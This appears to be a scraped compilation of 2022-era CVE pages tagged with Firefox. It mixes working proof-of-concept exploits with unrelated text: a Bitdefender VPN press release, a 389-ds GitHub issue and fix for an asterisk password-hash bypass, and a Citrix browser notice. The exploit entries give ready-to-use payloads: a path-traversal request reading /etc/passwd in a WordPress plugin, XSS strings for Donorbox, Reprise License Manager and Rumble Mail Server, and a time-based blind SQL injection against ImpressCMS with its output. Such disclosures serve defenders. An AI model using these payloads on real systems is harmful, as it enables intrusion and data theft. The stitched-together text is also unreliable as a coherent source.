The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

    # Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - LocalFile Inclusion - Unauthenticated# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/# Version: 1.0.3# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable File: tblight.php# Vulnerable Code:```if(!empty($_GET['controller']) && !empty($_GET['action']) &&!empty($_GET['ajax']) && $_GET['ajax'] == 1){    require_once('' . 'controllers/'.$_GET['controller'].'.php');}```# Proof of concept:http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1># POC image:https://prnt.sc/9O8_akDp2HPC

CVE-2022-1391: WordPress Cab-Fare-Calculator 1.0.3 Local File Inclusion ≈ Packet Storm

The Cab fare calculator WordPress plugin through 1.0.3 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

The Donorbox WordPress plugin before 7.1.7 does not sanitise and escape its Campaign URL settings before outputting it in an attribute, leading to a Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed

    # Exploit Title: WordPress Plugin donorbox-donation-form 7.1.6 -Stored Cross Site Scripting (Authenticated)# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage:https://wordpress.org/plugins/donorbox-donation-form<https://wordpress.org/plugins/amministrazione-aperta/># Version: 7.1.6# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:```public function donorbox_embed_campaign_id_settings() { ?>        <inputname="donorbox_embed_campaign_options[donorbox_embed_campaign_id]"type="text" value="<?php echo $this->options['donorbox_embed_campaign_id'];?>" class="regular-text" />        <?php    }```# POC1) Install donorbox-donation-form<https://wordpress.org/plugins/amministrazione-aperta/> WordPress plugin2)Open donorbox plugin settings3) Inject payload in URL field4) XSS will trigger.# Timeline21/03/2022 - Vendor notified24/03/2022 - Fix / patch24/03/2022 - CVE Requested29/03/2022 - Public disclosure

CVE-2022-1396: WordPress Donorbox-Donation-Form 7.1.6 Cross Site Scripting ≈ Packet Storm

New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private Web browsing.

BUCHAREST, Romania and SANTA CLARA, Calif., April 21, 2022 -- Bitdefender, a global cybersecurity leader, today announced new enhancements to its Bitdefender Premium Virtual Private Network (VPN) Service designed to bolster privacy, identity protection and security for consumers. New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private web browsing from anywhere in the world using a computer or mobile device. It is simple to set up and comes with an intuitive interface for any level user.

Cybersecurity and data privacy are converging as consumers grow increasingly concerned about who has access to their personally identifiable information, as well as data collected about their online activities and how that data is sold, traded and used. Even when consumers use so-called "Private Browsing" or "Incognito" modes on major web browsers, internet service providers (ISPs), wireless hotspots and websites often still collect information about their browsing history and online behavior.

Data tracking, spyware and other malicious threats are still a reality on open public Wi-Fi networks. According to Firefox telemetry, about 80 percent of web traffic globally is encrypted. Additionally, a study found that about six percent of the top 10,000 websites secured by HTTPS had TLS protocol security flaws.

Recent Bitdefender research revealed that most consumers are highly exposed to risk, with the majority (61 percent) not using VPN services and anti-trackers, ad blockers (44 percent) or privacy software of any type (64 percent) on the personal devices they use most for online activities.

"It has become increasingly difficult for consumers to maintain privacy and keep their data secure as they conduct their digital lives online," said Ciprian Istrate, vice president, Bitdefender Consumer Solutions. "We incorporated ad blocking and anti-tracking capabilities to Bitdefender Premium VPN to deliver both solid protection and anonymity as users enjoy favorite online activities without concern their online behaviors are being tracked or personal data collected and sold either legally or illegally."

**Bitdefender Premium VPN Key Features**

*   **Powerful Encryption for All Web Traffic** \-- Securely encrypt all incoming and outgoing web traffic for Windows, Mac, Android and iOS devices leveraging over 4,000 Bitdefender VPN servers across 49 countries. Keep online identities and activities safe from hackers, ISPs and others for safe online streaming and downloads, with no traffic logs.
*   **Built-In Ad Blocker for Better Browsing Experience** \-- Native ad blocker module removes ads, banners, pop-ups and video ads from websites for a better browsing experience. Blocking intrusive ads reduces the risk of adware and malware, and helps users save bandwidth while reclaiming the entire screen for relevant content only.
*   **Prevent Online Profiling With Anti-Tracker --** Block advertisers, websites and other third-parties from collecting data such as device type, location, web queries, shopping preferences and more. Preventing the collection of such data not only protects consumer privacy, it can speed performance of users' devices.
*   **Achieve System-Wide Protection --** As opposed to web browser extensions that only offer privacy within that browser, Bitdefender VPN Premium blocks disrupting ads and tracking modules across the user's entire device without slowing down systems or leaving gaps in defense.
*   **Whitelist Trusted Websites --** Easily make exceptions to ad blocking and anti-tracking features as desired, by adding the URLs of specific, trusted domains to a whitelist. This enables VPN users to ensure secure, encrypted browsing while accessing websites that might otherwise not load properly when tracking codes are blocked.

**Availability**

Bitdefender Premium VPN is available for Windows, macOS, Android and iOS devices. New ad blocker, anti-tracker and whitelist capabilities are now available to all users, including free and trial customers. For more information or to purchase Bitdefender Premium VPN visit https://www.bitdefender.com/solutions/vpn.html.

**About Bitdefender**

Bitdefender provides cybersecurity solutions with leading security efficacy, performance and ease of use to small and medium businesses, mid-market enterprises and consumers. Guided by a vision to be the world's most trusted cybersecurity solutions provider, Bitdefender is committed to defending organizations and individuals around the globe against cyberattacks to transform and improve their digital experience. For more information, visit https://www.bitdefender.com.

Bitdefender Enhances Premium VPN Service With New Privacy Protection Technologies

Zoho ManageEngine ADSelfService Plus before 6121, ADAuditPlus 7060, Exchange Reporter Plus 5701, and ADManagerPlus 7131 allow NTLM Hash disclosure during certain storage-path configuration steps.

CVE-2022-29457: ADSelfService Plus Release Notes

A flaw was found in 389-ds-base. If an asterisk is imported as password hashes, either accidentally or maliciously, then instead of being inactive, any password will successfully match during authentication. This flaw allows an attacker to successfully authenticate as a user whose password was disabled.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

rwinter77 opened this issue

Jun 29, 2021

· 8 comments · Fixed by #4819

Assignees

**Comments**

**Issue Description**  
If an entry contains an asterisk as the crypted password hash, binding is possible with any password for this entry  
userPassword: {CRYPT}\*

**Package Version and Platform:**

*   Platform: openSUSE Leap 15.2
*   Package and version: 389-ds-1.4.3.23~git0.f53d0132b-lp152.2.15.1.x86\_64
*   Browser firefox

**Steps to Reproduce**  
Steps to reproduce the behavior:

1.  Create an entry (e.g. a posixAccount) with the userPassword set to "{CRYPT}\*", e.g. by importing it from an ldif file
2.  Try to bind with that entry using an arbitrary password (e.g. "llhh"
3.  Check if the binding was successfull

**Expected results**  
I would expect to fail the binding with any password because the asterisk is not a vaild character in a crypted password.

**Screenshots**  
If applicable, add screenshots to help explain your problem.

**Additional context**  
Problem occured after importing entries from a NIS database. In NIS (and in /etc/shadow), the asterisk is often used for special users like "nobody".

@mreynolds389 We can adjust to 1.4.2 if you need to still support that version too :)

> @mreynolds389 We can adjust to 1.4.2 if you need to still support that version too :)

Actually 1.4.3 is out of support too. We can backport a fix but there are no more releases being made.

I need to double check what SUSE is doing but 15.2 may still be in support for us. Happy to just manage this myself, we wont need a release to apply this. Anyway, I've written a test and I'm going to investigate this today.

EDIT: Opps, 1.4.3 is what 15.2 has, so that's fine there. We don't need it for 1.4.2.

Okay, it looks like the fault is here

       56  	    /* we use salt (first 2 chars) of encoded password in call to crypt_r() */
       57  	    cp = crypt_r(userpwd, dbpwd, &data);
    -> 58  	    if (cp) {
       59  	        rc = slapi_ct_memcmp(dbpwd, cp, strlen(dbpwd));
       60  	    } else {
       61  	        rc = -1;
    (lldb) print cp
    (char *) $9 = 0x00007f696dff2160 "*0"
    

Were trying to set the salt into crypt\_r from dbpwd, but in this case dbpwd is "\*", which means that the result that is emitted as cp is "\*0". Then ct\_memcmp is using the length of dbpwd, which is 1, so we only check the '\*'.

There are quite a number of hardening changes here that can prevent this.

Firstyear added a commit to Firstyear/389-ds-base that referenced this issue

Jun 30, 2021

…words

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: 389ds#4817

Author: William Brown <william@blackhats.net.au>

Review by: ???

> I need to double check what SUSE is doing but 15.2 may still be in support for us. Happy to just manage this myself, we wont need a release to apply this. Anyway, I've written a test and I'm going to investigate this today.
> 
> EDIT: Opps, 1.4.3 is what 15.2 has, so that's fine there. We don't need it for 1.4.2.

Like I said we can still backport fixes to 1.4.3 (assuming they cleanly apply), and if it helps we can tag them, but there will be no fedora/centos releases.

Firstyear added a commit that referenced this issue

Jul 9, 2021

…words (#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: #4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

Firstyear added a commit to Firstyear/389-ds-base that referenced this issue

Jul 9, 2021

…words (389ds#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: 389ds#4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

Firstyear added a commit to Firstyear/389-ds-base that referenced this issue

Jul 9, 2021

…words (389ds#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: 389ds#4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

Firstyear added a commit that referenced this issue

Jul 9, 2021

…words (#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: #4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

@rwinter77 I'll get these patches into leap in the coming days

mreynolds389 pushed a commit that referenced this issue

Aug 12, 2021

 

…words (#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: #4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

Firstyear added a commit to Firstyear/389-ds-base that referenced this issue

Jun 8, 2022

…words (389ds#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: 389ds#4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

Firstyear added a commit to Firstyear/389-ds-base that referenced this issue

Jun 8, 2022

…words (389ds#4819)

Bug Description: Due to mishanding of short dbpwd hashes, the
crypt\_r algorithm was misused and was only comparing salts
in some cases, rather than checking the actual content
of the password.

Fix Description: Stricter checks on dbpwd lengths to ensure
that content passed to crypt\_r has at least 2 salt bytes and
1 hash byte, as well as stricter checks on ct\_memcmp to ensure
that compared values are the same length, rather than potentially
allowing overruns/short comparisons.

fixes: 389ds#4817

Author: William Brown <william@blackhats.net.au>

Review by: @mreynolds389

CVE-2021-3652: CRYPT password hash with asterisk · Issue #4817 · 389ds/389-ds-base

Citrix XenMobile Server 10.12 through RP11, 10.13 through RP7, and 10.14 through RP4 allows Command Injection.

Welcome to the Citrix Knowledge Center. Our site does not support outdated browser (or earlier) versions. To use our site, please take one of the following actions:

*   Upgrade your version of Internet Explorer. You can find more information here
*   Install the Google Chrome browser. You can find information here
*   Install the Firefox browser. You can find information here

Thank you,

The Citrix Knowledge Services Team

CVE-2022-26151: Search

Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture, and file/directory details.

    Multiple Vulnerabilities in Reprise License Manager 14.2Credit: Giulia Melotti Garibaldi//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28363# Vulnerability Title: Reflected Cross-Site Scripting# Severity: Medium# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goform/login_process/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28364# Vulnerability Title: Authenticated Reflected Cross-Site Scripting# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedOrigin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goforms/rlmswitchrCookie: REDACTED/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28365# Vulnerability Title: Unauthenticated Information Disclosure# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.Vulnerability PoC:GET http://HOST:5054/goforms/rlminfo HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveContent-Length: 0//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CVE-2022-28365: Reprise License Manager 14.2 Cross Site Scripting

SQL Injection in ImpressCMS 1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3

\# SQL Injection in ImpressCMS v1.4.3 and earlier allows remote attackers to inject into the code in unintended way, this allows an attacker to read and modify the sensitive information from the database used by the application. If misconfigured, an attacker can even upload a malicious web shell to compromise the entire system.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 7th March 2022

\# CVE ID: CVE-2022-26986

\# Confirmed on release 1.4.3

\# Vendor: https://www.impresscms.org/ Download is available at: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3

###############################################

#Step1- Login with Admin Credentials

#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):

POST /ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1 HTTP/1.1

Host: 192.168.56.117

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------40629177308912268471540748701

Content-Length: 1011

Origin: http://192.168.56.117

Connection: close

Referer: http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype&op=mod&mimetypeid=1

Cookie: tbl\_SystemMimetype\_sortsel=mimetypeid; tbl\_limitsel=15; tbl\_SystemMimetype\_filtersel=default; ICMSSESSION=7c9f7a65572d2aa40f66a0d468bb20e3

Upgrade-Insecure-Requests: 1

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="mimetypeid"

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="extension"

bin

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="types"

application/octet-stream

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="name"

Binary File/Linux Executable

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="icms\_page\_before\_form"

http://192.168.56.117/ImpressCMS/htdocs/modules/system/admin.php?fct=mimetype

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="op"

addmimetype

\-----------------------------40629177308912268471540748701

Content-Disposition: form-data; name="modify\_button"

Submit

\-----------------------------40629177308912268471540748701--

Vulnerable Payload:

1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE) //time-based blind (query SLEEP)

Output:

web application technology: Apache 2.4.52, PHP 7.4.27

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

available databases \[6\]:

\[\*\] impresscms

\[\*\] information\_schema

\[\*\] mysql

\[\*\] performance\_schema

\[\*\] phpmyadmin

\[\*\] test

CVE-2022-26986: 0days/Exploit.txt at main · sartlabs/0days

A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter.

    # Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
    # Date: 2020-9-3
    # Exploit Author: Mohammed Alshehri
    # Vendor Homepage: http://rumble.sf.net/
    # Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
    # Version: Version 0.51.3135
    # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
    
    # Exploit:
    POST /users HTTP/1.1
    Host: 127.0.0.1:2580
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 96
    Origin: http://127.0.0.1:2580
    Authorization: Basic YWRtaW46YWRtaW4=
    Connection: keep-alive
    Referer: http://127.0.0.1:2580/users
    Upgrade-Insecure-Requests: 1
    
    username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="shortcut icon" href="/favicon.ico " />
    <title>RumbleLua</title>
    <link href="rumblelua2.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
    <div class="header_top">
      <div class="header_stuff">
        RumbleLua on a.com<br />
        <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
        </span>
    
    <a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
    <a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
    
    <a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
    <a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
    <a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
    <a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
    <a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
    
    </div>
    </div>
    <div id="contents">
    
    
    <h1>RumbleLua users </h1>
    <p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
    Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
    while regular users can only
    see and edit the domains they have access to.
    </p>
    <table class="elements">
      <tr>
        <th>Create a new user:</th>
      </tr>
    <tr>
    <td>
    <form action="/users" method="post" name="makeuser">
    
      <div style="width: 300px; text-align:right; float: left;">
        <label for="username"><strong>Username:</strong></label>
        <input name="username" autocomplete="off" type="text" id="username" >
        <br>
        <label for="password"><strong>Password:</strong></label>
        <input type="password" autocomplete="off" name="password" id="password">
        <br />
        <label for="password"><strong>Access rights:</strong></label>
        <select name="rights" size="4" style="width: 150px;" multiple="multiple">
        <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
        <optgroup label="Domains:">
            </optgroup>
        </select>
          </div>
        <p><br /><br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    <br />
    
          &nbsp;&nbsp;
          <input type="submit" name="submit" id="submit" value="Submit" />
        </p>
    
    </form>
    </td>
    </tr>
    </table>
    <table width="200" class="elements">
      <tr>
        <th>Username</th>
        <th>Rights</th>
        <th>Actions</th>
      </tr>
      <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
        <tr>
        <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
        <td>Full control</td>
        <td>
    	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
    	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
    	</td>
      </tr>
      </table>
    <p>&nbsp;</p>
    
    
    </div>
    <br />
    <p align="center">
    Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
    </p>
    </body>
    
    
    </html>

Tag

#firefox